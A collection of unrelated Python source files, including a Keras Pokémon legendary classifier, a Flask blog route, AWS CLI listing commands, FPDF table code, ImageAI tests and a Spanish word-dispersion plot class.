df = df[['isLegendary','Generation', 'Type_1', 'Type_2', 'HP', 'Attack', 'Defense', 'Sp_Atk', 'Sp_Def', 'Speed','Color','Egg_Group_1','Height_m','Weight_kg','Body_Style']]
#some of our data isn't in integers, so we have to convert it.
df['isLegendary'] = df['isLegendary'].astype(int)
#we'll have to create dummy boolean variables(then convert to int) for pokemon type to prevent ranking elements
#we'll create a function for this
#get.dummies is used to create a dummy dataframe of that category
#concat is used to add it to our original data frame
#drop is used to remove the original columns since we have some new shiny ones
def dummy_creation(df, dummy_categories):
for i in dummy_categories:
df_dummy = pd.get_dummies(df[i])
df = pd.concat([df,df_dummy],axis=1)
df = df.drop(i, axis=1)
return(df)
#now let's run the function for the groups!
df = dummy_creation(df, ['Egg_Group_1', 'Body_Style', 'Color','Type_1', 'Type_2'])
#now we need to split the data into 0.7 train and 0.3 test
#This function takes any Pokémon whose "Generation" label 1 and putting it into the test dataset,
#and putting everyone else in the training dataset.
#It then drops the Generation category from the dataset.
def train_test_splitter(DataFrame, column):
df_train = DataFrame.loc[df[column] != 1]
df_test = DataFrame.loc[df[column] == 1]
df_train = df_train.drop(column, axis=1)
df_test = df_test.drop(column, axis=1)
return(df_train, df_test)
df_train, df_test = train_test_splitter(df, 'Generation')
#now we need to separate the labels from the data itself
#you dont give a child the answers when you want to teach them
#ergo, we drop the Legendary category since that's what we're looking for
#by creating this nifty function that can drop any column
def label_delineator(df_train, df_test, label):
train_data = df_train.drop(label, axis=1).values
train_labels = df_train[label].values
test_data = df_test.drop(label,axis=1).values
test_labels = df_test[label].values
return(train_data, train_labels, test_data, test_labels)
#now, run the function and remove the isLegendary category!
train_data, train_labels, test_data, test_labels = label_delineator(df_train, df_test, 'isLegendary')
#now that the data has been adequately prepped, let's normalise it!
#this ensures everything is on the same scale
#we'll do that by creating another function
def data_normalizer(train_data, test_data):
train_data = preprocessing.MinMaxScaler().fit_transform(train_data)
test_data = preprocessing.MinMaxScaler().fit_transform(test_data)
return(train_data, test_data)
#now run the function and min-max your data!
train_data, test_data = data_normalizer(train_data, test_data)
#ta-dah! now we can move ahead to machine learning! fireworks
#we'll have two fully connected neural layers here
#layer 1 is a 'ReLU' (Rectified Linear Unit)' activation function
#we need to specify input_size, which is the shape of an entry in our dataset
#layer 2 is a softmax one!this is a type of logistic regression done for situations with multiple cases
#with the softmax we delineate the possible identities of the Pokémon into 2 probability groups corresponding to the possible labels
length = train_data.shape[1]
model = keras.Sequential()
model.add(keras.layers.Dense(500, activation='relu', input_shape=[length,]))
model.add(keras.layers.Dense(2, activation='softmax'))
#now we need to compile our data
#there are two important concepts: the optimizer which is used to guess the relation
#and the loss module which tells the computer how off it is.
#there's also metrics, which specifies which information it provides so we can analyze the model
model.compile(optimizer='sgd', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
#now fit thy model, a.k.a. train your model
model.fit(train_data, train_labels, epochs=800)
#now, let's test the model
#model.evaluate shows how accurate the model is in loss and accuracy values
loss_value, accuracy_value = model.evaluate(test_data, test_labels)
print("The loss value is ",loss_value)
print("The accuracy value is ", accuracy_value)
#now, let's try predicting something!
#we do this with the predict function!
#research the argmax thing
def predictor(test_data, test_labels, index):
prediction = model.predict(test_data)
if np.argmax(prediction[index]) == test_labels[index]:
print(f'This was correctly predicted to be a \"{test_labels[index]}\"!')
else:
print(f'This was incorrectly predicted to be a \"{np.argmax(prediction[index])}\". It was actually a \"{test_labels[index]}\".')
return(prediction)
#now, gaze upon your data. find the pokedex number and randomly feed it in
#mewtwo is number 150, and we're ripping off the tutorial so...
predictor(test_data, test_labels, 149) |
import datetime
from flask import render_template, Blueprint, abort
from flask_login import current_user
from wfdb.models import db, Post, Comment, User
from wfdb.forms import CommentForm
blog_blueprint = Blueprint(
'blog',
__name__,
template_folder='../templates/blog',
url_prefix="/blog"
)
@blog_blueprint.route("/")
def blog():
posts = Post.query.order_by(Post.publish_date.desc()).all()
return render_template("blog.html", posts=posts)
@blog_blueprint.route("/<int:post_id>", methods=["GET", "POST"])
def post(post_id):
post = Post.query.get_or_404(post_id)
form = CommentForm()
if form.validate_on_submit():
if current_user.is_anonymous:
abort(403)
comment = Comment()
comment.text = form.text.data
comment.date = datetime.datetime.now()
comment.post = post
comment.user = current_user
db.session.add(comment)
db.session.commit()
return render_template("post.html", post=post, form=form)
|
import numpy as np
import matplotlib.pyplot as plt
from scipy.integrate import solve_ivp
class ExponentialDecay():
"""Exponential decay class."""
def __init__(self, a):
"""ExponentialDecay class takes a decay constant a as argument."""
self.a = a
def __call__(self, t, u):
"""
Special method __call__ that finds the derivative of u when u(t) is
known.
Parameters: t -- Time where the derivative should be calculated at.
u -- Value of the decay function at the given time t.
Returns: The derivative of the decay function u at a time t.
"""
return -self.a*u
def solve(self, u0, T, dt):
"""
Solves the ODE using scipy.integrate solve_ivp function.
Parameters: u0 -- An initial value for the function u(0) at time t=0.
T -- End time for the experiment.
dt -- Timestep we want to use in our calculation.
Returns: sol.t -- Array with time values.
sol.y -- Array with values of u at given time t in sol.t
"""
sol = solve_ivp(self, [0, T], [u0], t_eval=np.arange(0, T, dt))
return sol.t, sol.y[0]
if __name__ == "__main__":
#plotting a test run
a = 0.4 # Decay constants
u0 = 3.2 # Function value u(t) for some known time t
T = 5. # Timespan
dt = 0.1 # Timestep
decay_model = ExponentialDecay(a)
t, u = decay_model.solve(u0, T, dt)
plt.style.use("classic")
plt.plot(t, u)
plt.grid()
plt.show()
|
# coding: utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
import os, sys, copy, time
from datetime import datetime
from . import register_parser
from .util import Timestamp, paginate, describe_cidr, add_time_bound_args
from .util.printing import page_output, tabulate, GREEN, BLUE
from .util.aws import ARN, resolve_instance_id, resources, clients
from .util.compat import timestamp
def column_completer(parser, **kwargs):
resource = getattr(resources, parser.get_default("resource"))
subresource = getattr(resource, parser.get_default("subresource"))
return [attr for attr in dir(subresource("")) if not attr.startswith("_")]
def register_listing_parser(function, **kwargs):
col_def = dict(default=kwargs.pop("column_defaults")) if "column_defaults" in kwargs else {}
parser = register_parser(function, **kwargs)
col_arg = parser.add_argument("-c", "--columns", nargs="+", help="Names of columns to print", **col_def)
col_arg.completer = column_completer
return parser
def register_filtering_parser(function, **kwargs):
parser = register_listing_parser(function, **kwargs)
parser.add_argument("-f", "--filter", nargs="+", default=[], metavar="FILTER_NAME=VALUE",
help="Filter(s) to apply to output, e.g. --filter state=available")
parser.add_argument("-t", "--tag", nargs="+", default=[], metavar="TAG_NAME=VALUE",
help="Tag(s) to filter output by")
return parser
def filter_collection(collection, args):
filters = []
# TODO: shlex?
for f in getattr(args, "filter", []):
name, value = f.split("=", 1)
if collection.__class__.__name__ == "ec2.instancesCollectionManager":
name = name.replace("_", "-")
if name == "state":
name = "instance-state-name"
filters.append(dict(Name=name, Values=[value]))
for t in getattr(args, "tag", []):
name, value = t.split("=", 1)
filters.append(dict(Name="tag:" + name, Values=[value]))
return collection.filter(Filters=filters)
def filter_and_tabulate(collection, args, **kwargs):
return tabulate(filter_collection(collection, args), args, **kwargs)
def add_name(instance):
instance.name = instance.id
for tag in instance.tags or []:
if tag["Key"] == "Name":
instance.name = tag["Value"]
return instance
def ls(args):
for col in "tags", "launch_time":
if col not in args.columns:
args.columns.append(col)
instances = [add_name(i) for i in filter_collection(resources.ec2.instances, args)]
args.columns = ["name"] + args.columns
cell_transforms = {
"state": lambda x, r: x["Name"],
"security_groups": lambda x, r: ", ".join(sg["GroupName"] for sg in x),
"iam_instance_profile": lambda x, r: x.get("Arn", "").split("/")[-1] if x else None
}
page_output(tabulate(instances, args, cell_transforms=cell_transforms))
parser = register_filtering_parser(ls, help="List EC2 instances")
parser.add_argument("--sort-by")
def console(args):
instance_id = resolve_instance_id(args.instance)
err = "[No console output received for {}. Console output may lag by several minutes.]".format(instance_id)
page_output(resources.ec2.Instance(instance_id).console_output().get("Output", err))
parser = register_parser(console, help="Get console output for an EC2 instance")
parser.add_argument("instance")
def images(args):
page_output(filter_and_tabulate(resources.ec2.images.filter(Owners=["self"]), args))
parser = register_filtering_parser(images, help="List EC2 AMIs")
parser.add_argument("--sort-by")
peer_desc_cache = {}
def describe_peer(peer):
if "CidrIp" in peer:
if peer["CidrIp"] not in peer_desc_cache:
peer_desc_cache[peer["CidrIp"]] = describe_cidr(peer["CidrIp"])
return peer["CidrIp"], peer_desc_cache[peer["CidrIp"]]
else:
if peer["GroupId"] not in peer_desc_cache:
peer_desc_cache[peer["GroupId"]] = resources.ec2.SecurityGroup(peer["GroupId"])
return peer_desc_cache[peer["GroupId"]].group_name, peer_desc_cache[peer["GroupId"]].description
def security_groups(args):
def format_rule(row, perm, peer, egress=False):
peer_desc, row.peer_description = describe_peer(peer)
row.rule = BLUE("●") + ":" + str(perm.get("FromPort" if egress else "ToPort", "*"))
row.rule += GREEN("▶") if egress else GREEN("◀")
row.rule += peer_desc + ":" + str(perm.get("ToPort" if egress else "FromPort", "*"))
row.proto = "*" if perm["IpProtocol"] == "-1" else perm["IpProtocol"]
table = []
for sg in resources.ec2.security_groups.all():
for i, perm in enumerate(sg.ip_permissions + sg.ip_permissions_egress):
for peer in perm["IpRanges"] + perm["UserIdGroupPairs"]:
table.append(copy.copy(sg))
format_rule(table[-1], perm, peer, egress=True if i > len(sg.ip_permissions) - 1 else False)
page_output(tabulate(table, args))
parser = register_filtering_parser(security_groups, help="List EC2 security groups")
def acls(args):
page_output(filter_and_tabulate(resources.ec2.network_acls, args))
parser = register_filtering_parser(acls, help="List EC2 network ACLs")
def logs(args):
if args.log_group and (args.log_stream or args.start_time or args.end_time):
args.pattern, args.follow = None, False
return grep(args)
table = []
group_cols = ["logGroupName"]
stream_cols = ["logStreamName", "lastIngestionTime", "storedBytes"]
args.columns = group_cols + stream_cols
for group in paginate(clients.logs.get_paginator("describe_log_groups")):
if args.log_group and group["logGroupName"] != args.log_group:
continue
n = 0
for stream in paginate(clients.logs.get_paginator("describe_log_streams"),
logGroupName=group["logGroupName"], orderBy="LastEventTime", descending=True):
now = datetime.utcnow().replace(microsecond=0)
stream["lastIngestionTime"] = now - datetime.utcfromtimestamp(stream.get("lastIngestionTime", 0) // 1000)
table.append(dict(group, **stream))
n += 1
if n >= args.max_streams_per_group:
break
page_output(tabulate(table, args))
parser = register_parser(logs, help="List CloudWatch Logs groups and streams")
parser.add_argument("--max-streams-per-group", "-n", type=int, default=8)
parser.add_argument("--sort-by", default="lastIngestionTime:reverse")
parser.add_argument("log_group", nargs="?", help="CloudWatch log group")
parser.add_argument("log_stream", nargs="?", help="CloudWatch log stream")
add_time_bound_args(parser)
def grep(args):
filter_args = dict(logGroupName=args.log_group)
if args.log_stream:
filter_args.update(logStreamNames=[args.log_stream])
if args.pattern:
filter_args.update(filterPattern=args.pattern)
if args.start_time:
filter_args.update(startTime=int(timestamp(args.start_time) * 1000))
if args.end_time:
filter_args.update(endTime=int(timestamp(args.end_time) * 1000))
num_results = 0
while True:
for event in paginate(clients.logs.get_paginator("filter_log_events"), **filter_args):
if "timestamp" not in event or "message" not in event:
continue
print(str(Timestamp(event["timestamp"])), event["message"])
num_results += 1
if args.follow:
time.sleep(1)
else:
return SystemExit(os.EX_OK if num_results > 0 else os.EX_DATAERR)
grep_parser = register_parser(grep, help="Filter and print events in a CloudWatch Logs stream or group of streams")
grep_parser.add_argument("pattern", help="""CloudWatch filter pattern to use. Case-sensitive. See
http://docs.aws.amazon.com/AmazonCloudWatch/latest/DeveloperGuide/FilterAndPatternSyntax.html""")
grep_parser.add_argument("log_group", help="CloudWatch log group")
grep_parser.add_argument("log_stream", nargs="?", help="CloudWatch log stream")
grep_parser.add_argument("--follow", "-f", help="Repeat search continuously instead of running once",
action="store_true")
add_time_bound_args(grep_parser)
def clusters(args):
cluster_arns = sum([p["clusterArns"] for p in clients.ecs.get_paginator("list_clusters").paginate()], [])
page_output(tabulate(clients.ecs.describe_clusters(clusters=cluster_arns)["clusters"], args))
parser = register_listing_parser(clusters, help="List ECS clusters")
def tasks(args):
cluster_arns = sum([p["clusterArns"] for p in clients.ecs.get_paginator("list_clusters").paginate()], [])
table = []
for cluster_arn in cluster_arns:
list_tasks_args = dict(cluster=cluster_arn, desiredStatus=args.desired_status)
paginator = clients.ecs.get_paginator("list_tasks")
task_arns = sum([p["taskArns"] for p in paginator.paginate(**list_tasks_args)], [])
if task_arns:
for task in clients.ecs.describe_tasks(cluster=cluster_arn, tasks=task_arns)["tasks"]:
table.append(task)
page_output(tabulate(table, args))
parser = register_listing_parser(tasks, help="List ECS tasks")
parser.add_argument("--desired-status", choices={"RUNNING", "PENDING", "STOPPED"}, default="RUNNING")
def taskdefs(args):
table = []
for taskdef_arn in clients.ecs.list_task_definitions()["taskDefinitionArns"]:
table.append(clients.ecs.describe_task_definition(taskDefinition=taskdef_arn)["taskDefinition"])
page_output(tabulate(table, args))
parser = register_listing_parser(taskdefs, help="List ECS task definitions",
column_defaults=["family", "revision", "containerDefinitions"])
def sirs(args):
page_output(tabulate(clients.ec2.describe_spot_instance_requests()["SpotInstanceRequests"], args))
parser = register_listing_parser(sirs, help="List EC2 spot instance requests")
def sfrs(args):
page_output(tabulate(paginate(clients.ec2.get_paginator("describe_spot_fleet_requests")), args))
parser = register_listing_parser(sfrs, help="List EC2 spot fleet requests")
parser.add_argument("--trim-col-names", nargs="+", default=["SpotFleetRequestConfig.", "SpotFleetRequest"])
parser.add_argument("--sort-by")
def key_pairs(args):
page_output(tabulate(resources.ec2.key_pairs.all(), args))
parser = register_listing_parser(key_pairs, help="List EC2 SSH key pairs", column_defaults=["name", "key_fingerprint"])
def subnets(args):
page_output(filter_and_tabulate(resources.ec2.subnets, args))
parser = register_filtering_parser(subnets, help="List EC2 VPCs and subnets")
def tables(args):
page_output(tabulate(resources.dynamodb.tables.all(), args))
parser = register_listing_parser(tables, help="List DynamoDB tables")
def subscriptions(args):
page_output(tabulate(paginate(clients.sns.get_paginator("list_subscriptions")), args))
parser = register_listing_parser(subscriptions, help="List SNS subscriptions",
column_defaults=["SubscriptionArn", "Protocol", "Endpoint"])
def limits(args):
"""
Describe limits in effect on your AWS account. See also https://console.aws.amazon.com/ec2/v2/home#Limits:
"""
# https://aws.amazon.com/about-aws/whats-new/2014/06/19/amazon-ec2-service-limits-report-now-available/
# Console-only APIs: getInstanceLimits, getAccountLimits, getAutoscalingLimits, getHostLimits
# http://boto3.readthedocs.io/en/latest/reference/services/dynamodb.html#DynamoDB.Client.describe_limits
attrs = ["max-instances", "vpc-max-security-groups-per-interface", "vpc-max-elastic-ips"]
table = clients.ec2.describe_account_attributes(AttributeNames=attrs)["AccountAttributes"]
page_output(tabulate(table, args))
parser = register_parser(limits)
def cmks(args):
aliases = {alias.get("TargetKeyId"): alias for alias in paginate(clients.kms.get_paginator("list_aliases"))}
table = []
for key in paginate(clients.kms.get_paginator("list_keys")):
key.update(aliases.get(key["KeyId"], {}))
table.append(key)
page_output(tabulate(table, args))
parser = register_parser(cmks, help="List KMS Customer Master Keys")
def certificates(args):
page_output(tabulate(paginate(clients.acm.get_paginator("list_certificates")), args))
parser = register_parser(certificates, help="List Amazon Certificate Manager SSL certificates")
|
from fpdf import FPDF
class PDF(FPDF):
def basic_table(self, headings, rows):
for heading in headings:
self.cell(40, 7, heading, 1)
self.ln()
for row in rows:
for col in row:
self.cell(40, 6, col, 1)
self.ln()
def improved_table(self, headings, rows, col_widths=(42, 39, 35, 40)):
for col_width, heading in zip(col_widths, headings):
self.cell(col_width, 7, heading, 1, 0, "C")
self.ln()
for row in rows:
self.cell(col_widths[0], 6, row[0], "LR")
self.cell(col_widths[1], 6, row[1], "LR")
self.cell(col_widths[2], 6, row[2], "LR", 0, "R")
self.cell(col_widths[3], 6, row[3], "LR", 0, "R")
self.ln()
# Closure line:
self.cell(sum(col_widths), 0, "", "T")
def colored_table(self, headings, rows, col_widths=(42, 39, 35, 42)):
# Colors, line width and bold font:
self.set_fill_color(255, 100, 0)
self.set_text_color(255)
self.set_draw_color(255, 0, 0)
self.set_line_width(0.3)
self.set_font(style="B")
for col_width, heading in zip(col_widths, headings):
self.cell(col_width, 7, heading, 1, 0, "C", True)
self.ln()
# Color and font restoration:
self.set_fill_color(224, 235, 255)
self.set_text_color(0)
self.set_font()
fill = False
for row in rows:
self.cell(col_widths[0], 6, row[0], "LR", 0, "L", fill)
self.cell(col_widths[1], 6, row[1], "LR", 0, "L", fill)
self.cell(col_widths[2], 6, row[2], "LR", 0, "R", fill)
self.cell(col_widths[3], 6, row[3], "LR", 0, "R", fill)
self.ln()
fill = not fill
self.cell(sum(col_widths), 0, "", "T")
def load_data_from_csv(csv_filepath):
headings, rows = [], []
with open(csv_filepath, encoding="utf8") as csv_file:
for row in csv.reader(csv_file, delimiter=","):
if not headings: # extracting column names from first row:
headings = row
else:
rows.append(row)
return headings, rows
col_names, data = load_data_from_csv("export/"+var_beraternummer+"_"+var_mandantennummer+"_"+var_stmonat+"_"+var_stjahr+"_Export_Steuer.csv") ##
pdf = FPDF(orientation="landscape", unit="mm")
pdf.add_page()
pdf.set_font("helvetica", "B", 16)
pdf.cell(278, 10, "Hilfsliste berechnete und exportierte Werte im Abrechnungszeitraum: "+var_stmonat+"/"+var_stjahr, 1, align="C")
pdf.output("tuto2.pdf")
#col_names, data = load_data_from_csv("countries.txt")
#pdf = PDF()
#pdf.set_font("helvetica", size=14)
#pdf.add_page()
#pdf.basic_table(col_names, data)
#pdf.add_page()
#pdf.improved_table(col_names, data)
#pdf.add_page()
#pdf.colored_table(col_names, data)
#pdf.output("tuto5.pdf")
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 11 14:14:57 2021
@author: drjc
"""
from datetime import datetime
from torch.utils.data import DataLoader, random_split
import pytorch_lightning as pl
from pytorch_lightning import Trainer
from pytorch_lightning.loggers.test_tube import TestTubeLogger
from pytorch_lightning.callbacks import ModelCheckpoint, EarlyStopping
from pytorch_lightning.utilities.parsing import AttributeDict
from models import YourModel
from data_modules import MedNIST
from constants import DATADIR
from IPython import embed
#%%
def train(hparams):
early_stop_callback = EarlyStopping(
monitor='val_loss_epoch',
min_delta=1,
patience=10,
verbose=True,
mode='min',
strict=False
)
date_time = datetime.now().strftime("%Y-%m-%d")
ckpt_callback = ModelCheckpoint(
dirpath=None,
monitor='val_loss_epoch',
verbose=1,
save_top_k=5,
save_weights_only=True,
mode='min',
period=1,
filename='{epoch}-{train_loss_epoch:.3f}-{val_loss_epoch:.3f}'
)
logger = TestTubeLogger(save_dir=hparams.log_path,
name=date_time)
trainer = Trainer(
accelerator=hparams.accel,
auto_lr_find=hparams.autolr,
benchmark=True,
callbacks=[ckpt_callback, early_stop_callback],
check_val_every_n_epoch=hparams.check_val_n,
fast_dev_run=False,
gpus=hparams.gpus,
logger=logger,
max_epochs=hparams.max_epochs,
overfit_batches=16,
profiler=False,
)
data = MedNIST(hparams)
# embed()
model = YourModel(hparams)
trainer.fit(model, data)
if __name__ == "__main__":
hparams = AttributeDict(
{
'accel': None,
'autolr': False,
'batch_size': 2,
'check_val_n': 1,
'dev': False,
'gpus': None,
'log_path': DATADIR.joinpath('logs'),
'lr': 0.0001,
'lr_schedule': 'ROP',
'max_epochs': 100,
'num_nodes': 1,
'num_workers': 0,
'pl_ver': pl.__version__,
'seed': 22117,
'weight_decay': 1e-07
})
train(hparams)
|
from imageai.Classification import ImageClassification
import os
import cv2
import pytest
from os.path import dirname
main_folder = os.getcwd()
def test_recognition_model_mobilenetv2():
predictor = ImageClassification()
predictor.setModelTypeAsMobileNetV2()
predictor.setModelPath(os.path.join(main_folder, "data-models", "mobilenet_v2.h5"))
predictor.loadModel()
predictions, probabilities = predictor.classifyImage(image_input=os.path.join(main_folder, main_folder, "data-images", "1.jpg"))
assert isinstance(predictions, list)
assert isinstance(probabilities, list)
assert isinstance(predictions[0], str)
assert isinstance(probabilities[0], float)
def test_recognition_model_resnet():
predictor = ImageClassification()
predictor.setModelTypeAsResNet50()
predictor.setModelPath(os.path.join(main_folder, "data-models", "resnet50_imagenet_tf.2.0.h5"))
predictor.loadModel()
predictions, probabilities = predictor.classifyImage(image_input=os.path.join(main_folder, main_folder, "data-images", "1.jpg"))
assert isinstance(predictions, list)
assert isinstance(probabilities, list)
assert isinstance(predictions[0], str)
assert isinstance(probabilities[0], float)
def test_recognition_model_inceptionv3():
predictor = ImageClassification()
predictor.setModelTypeAsInceptionV3()
predictor.setModelPath(os.path.join(main_folder, "data-models", "inception_v3_weights_tf_dim_ordering_tf_kernels.h5"))
predictor.loadModel()
predictions, probabilities = predictor.classifyImage(image_input=os.path.join(main_folder, main_folder, "data-images", "1.jpg"))
assert isinstance(predictions, list)
assert isinstance(probabilities, list)
assert isinstance(predictions[0], str)
assert isinstance(probabilities[0], float)
def test_recognition_model_densenet():
predictor = ImageClassification()
predictor.setModelTypeAsDenseNet121()
predictor.setModelPath(os.path.join(main_folder, "data-models", "DenseNet-BC-121-32.h5"))
predictor.loadModel()
predictions, probabilities = predictor.classifyImage(image_input=os.path.join(main_folder, main_folder, "data-images", "1.jpg"))
assert isinstance(predictions, list)
assert isinstance(probabilities, list)
assert isinstance(predictions[0], str)
assert isinstance(probabilities[0], float)
def test_recognition_model_resnet_array_input():
predictor = ImageClassification()
predictor.setModelTypeAsResNet50()
predictor.setModelPath(os.path.join(main_folder, "data-models", "resnet50_imagenet_tf.2.0.h5"))
predictor.loadModel()
image_array = cv2.imread(os.path.join(main_folder, main_folder, "data-images", "1.jpg"))
predictions, probabilities = predictor.classifyImage(image_input=image_array, input_type="array")
assert isinstance(predictions, list)
assert isinstance(probabilities, list)
assert isinstance(predictions[0], str)
assert isinstance(probabilities[0], float)
def test_recognition_model_inceptionv3_array_input():
predictor = ImageClassification()
predictor.setModelTypeAsInceptionV3()
predictor.setModelPath(os.path.join(main_folder, "data-models", "inception_v3_weights_tf_dim_ordering_tf_kernels.h5"))
predictor.loadModel()
image_array = cv2.imread(os.path.join(main_folder, main_folder, "data-images", "1.jpg"))
predictions, probabilities = predictor.classifyImage(image_input=image_array, input_type="array")
assert isinstance(predictions, list)
assert isinstance(probabilities, list)
assert isinstance(predictions[0], str)
assert isinstance(probabilities[0], float)
def test_recognition_model_densenet_array_input():
predictor = ImageClassification()
predictor.setModelTypeAsDenseNet121()
predictor.setModelPath(os.path.join(main_folder, "data-models", "DenseNet-BC-121-32.h5"))
predictor.loadModel()
image_array = cv2.imread(os.path.join(main_folder, main_folder, "data-images", "1.jpg"))
predictions, probabilities = predictor.classifyImage(image_input=image_array, input_type="array")
assert isinstance(predictions, list)
assert isinstance(probabilities, list)
assert isinstance(predictions[0], str)
assert isinstance(probabilities[0], float)
|
"""Config for a linear regression model evaluated on a diabetes dataset."""
from dbispipeline.evaluators import GridEvaluator
import dbispipeline.result_handlers as result_handlers
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import LinearSVR
from nlp4musa2020.dataloaders.alf200k import ALF200KLoader, genre_target_labels
import nlp4musa2020.evaluators as evaluators
from nlp4musa2020.models.simplenn_genre import SimpleGenreNN
dataloader = ALF200KLoader(
'data/processed/dataset-lfm-genres.pickle',
load_feature_groups=[
'statistical',
],
text_vectorizers=None,
target=genre_target_labels()
)
pipeline = Pipeline([
('scaler', StandardScaler()),
('model', SimpleGenreNN(epochs=50)),
])
evaluator = GridEvaluator(
parameters={
'model__dense_sizes': [
(32, 32),
(64, 64),
],
'model__dropout_rate': [
0.1,
],
},
grid_parameters=evaluators.grid_parameters_genres(),
)
result_handlers = [
result_handlers.print_gridsearch_results,
]
|
# Reversing an integer
def int_reversal(n):
remainder = 0
reverse = 0
while n > 0:
remainder = n % 10
reverse = reverse * 10 + remainder
n = n // 10
return reverse
if __name__ == '__main__':
num = 123456789123456789123456789
print(num)
num = int_reversal(num)
print(num)
|
from oo.pessoa import Pessoa
p = Pessoa()
print(type(p)) |
#!/usr/bin/env python
"""Test the mpu.datastructures.char_trie module."""
# Third party
import pytest
# First party
from mpu.datastructures.trie.char_trie import EMPTY_NODE, Trie, TrieNode
def test_trie_print():
data = ["dog", "cat", "cattle", "tom", "d", "tomcat", "tomatoe"]
trie = Trie(data)
trie_data = trie.print(print_stdout=False)
expected = """Trie
c
a
t
t
l
e
d
o
g
t
o
m
a
t
o
e
c
a
t"""
assert trie_data == expected
trie.print(print_stdout=True)
def test_create_trie_node_with_children():
TrieNode("b", children={"a": TrieNode("a")})
def test_trie_node_push():
node = TrieNode(value="a")
with pytest.raises(ValueError) as exinfo:
node.push("")
assert str(exinfo.value) == "The pushed value should not be empty"
def test_get_subtrie_from_empty():
node = Trie()
prefix, node = node.get_subtrie("")
assert prefix == ""
assert node._value == EMPTY_NODE._value
assert node.is_word == EMPTY_NODE.is_word
assert node.count == EMPTY_NODE.count
assert node.children == EMPTY_NODE.children
|
from django import VERSION
from autocomplete_light.compat import urls, url
urlpatterns = urls([
url(r'^$', 'navigation_autocomplete', name='navigation_autocomplete'),
])
|
# Librerias necesarias
import matplotlib.pyplot as plt
from matplotlib import cm
import numpy as np
import warnings
import itertools
import re
class dispersionPlot:
def __init__(
self,
text,
keywords,
ignore_case=True,
title="Gráfico de dispersión de palabras",
label_x="Distribución de términos",
label_y="Términos de interés",
labels=None,
auto_labels=True,
figsize=(12, 7),
marker="|",
marker_size=20,
marker_width=3,
colors=None,
cm="nipy_spectral",
legend=True,
rotation=30,
show=True,
outpath=None,
return_fig=False,
):
self._ignore_case = ignore_case
self.textos = text
self.keywords = keywords
self._title = title
self._label_x = label_x
self._label_y = label_y
self._autolabels = auto_labels
self.labels = labels
self._marker = marker
self._marker_size = marker_size
self._marker_width = marker_width
self._cm = cm
self.colors = colors
self._rotation = rotation
self._legend = legend
self._show = show
self._outpath = outpath
self._figsize = figsize
self._return_fig = return_fig
self._set_limites_x()
self._calcular_dispersion()
@property
def textos(self):
return self._textos
@textos.setter
def textos(self, text):
if isinstance(text, str):
self._textos = [
limpieza_basica(text, ignorar_mayus=self._ignore_case)
]
self._all_words = " ".join(self._textos).split()
elif all(isinstance(t, list) for t in text):
self._textos = text
self._all_words = list(itertools.chain.from_iterable(text))
elif isinstance(text, list):
self._textos = list(
map(limpieza_basica, text, [self._ignore_case] * len(text))
)
self._all_words = " ".join(self._textos).split()
else:
raise ValueError(
(
"Tipo de datos desconocido, por favor ingrese un texto "
"o una lista de textos"
)
)
@property
def keywords(self):
return self._keywords
@keywords.setter
def keywords(self, keywords):
if isinstance(keywords, list):
if self._ignore_case:
keywords = list(map(str.lower, keywords))
if len(np.unique(keywords)) != len(keywords):
warnings.warn(
"Existen palabras clave repetidas. Estás serán eliminadas"
)
indexes = np.unique(keywords, return_index=True)[1]
keywords = [keywords[index] for index in sorted(indexes)]
keywords.reverse()
self._comprobar_existencia(keywords)
else:
raise ValueError("Por favor ingrese una lista términos de interés")
@property
def labels(self):
return self._labels
@labels.setter
def labels(self, labels):
if labels is None and self._autolabels:
self._labels = [f"Doc {i+1}" for i in range(len(self.textos))]
elif labels is None:
self._labels = None
elif isinstance(labels, list):
if len(labels) == len(self.textos):
self._labels = labels
else:
raise ValueError(
(
"El número de etiquetas de entrada no es igual al "
"número de documentos."
)
)
else:
raise ValueError(
(
"El tipo de datos de las etiquetas no está permitido, "
"por favor ingrese una lista de etiquetas."
)
)
@property
def colors(self):
return self._colors
@colors.setter
def colors(self, colors):
if colors is None:
self._colors = self._paleta_color()
elif isinstance(colors, list):
if len(colors) == len(self.textos):
self._colors = colors
else:
raise ValueError(
(
"El número de colores de entrada debe ser igual al "
"número de documentos"
)
)
else:
raise ValueError(
(
"Tipo de datos en colores es desconocido, por favor"
"ingrese una lista de colores."
)
)
def _set_limites_x(self):
"""
Función para calcular finales de documentos y posición de \
etiquetas en gráfico de dispersión.
"""
try:
limits = [len(t.split()) for t in self._textos]
except Exception:
limits = [len(t) for t in self._textos]
limits = np.cumsum(limits) - 1
limits_ = np.insert(limits, 0, 0)
x_pos = [
limits_[i] + (limits_[i + 1] - limits_[i]) / 2
for i in range(len(limits))
]
self._limits = limits
self._x_limits = x_pos
def _comprobar_existencia(self, keywords):
"""
Comprueba si las keywords de entrada están en le texto.
"""
no_words = [w for w in keywords if w not in self._all_words]
if no_words:
if len(no_words) == len(keywords):
raise ValueError(
("No existe palabras claves asociada a los documentos.")
)
no_words = ", ".join(no_words)
warnings.warn(
(
"Advertencia: las palabras: ({})".format(no_words)
+ " no están en los documentos de entrada"
)
)
self._keywords = [w for w in keywords if w not in no_words]
else:
self._keywords = keywords
def _paleta_color(self):
"""
Define automaticamente los colores si colors=None
"""
cmap = cm.get_cmap(self._cm)
niveles = len(self._textos)
colores = [
cmap(c / (2 * niveles)) if c % 2 else cmap(0.5 + c / (2 * niveles))
for c in range(niveles)
]
return colores
def _calcular_dispersion(self):
"""
Calcula la dispersión de los términos en los documentos
"""
points = [
(x, y)
for x in range(len(self._all_words))
for y in range(len(self.keywords))
if self._all_words[x] == self.keywords[y]
]
x, y = list(zip(*points))
self._points_x = x
self._points_y = y
def graficar(self):
"""
Función para graficar la dispersión.
"""
x = np.asarray(self._points_x)
y = np.asarray(self._points_y)
fig, ax = plt.subplots(figsize=self._figsize)
lines = list()
for i, d in enumerate(self._limits):
if i == 0:
lines += ax.plot(
x[(x >= 0) & (x <= d)],
y[(x >= 0) & (x <= d)],
self._marker,
ms=self._marker_size,
mew=self._marker_width,
color=self.colors[i],
)
else:
d_ant = self._limits[i - 1]
lines += ax.plot(
x[(x > d_ant) & (x <= d)],
y[(x > d_ant) & (x <= d)],
self._marker,
ms=self._marker_size,
mew=self._marker_width,
color=self._colors[i],
)
ax.axvline(x=d + 0.5, color="lightgray", linestyle="dashed")
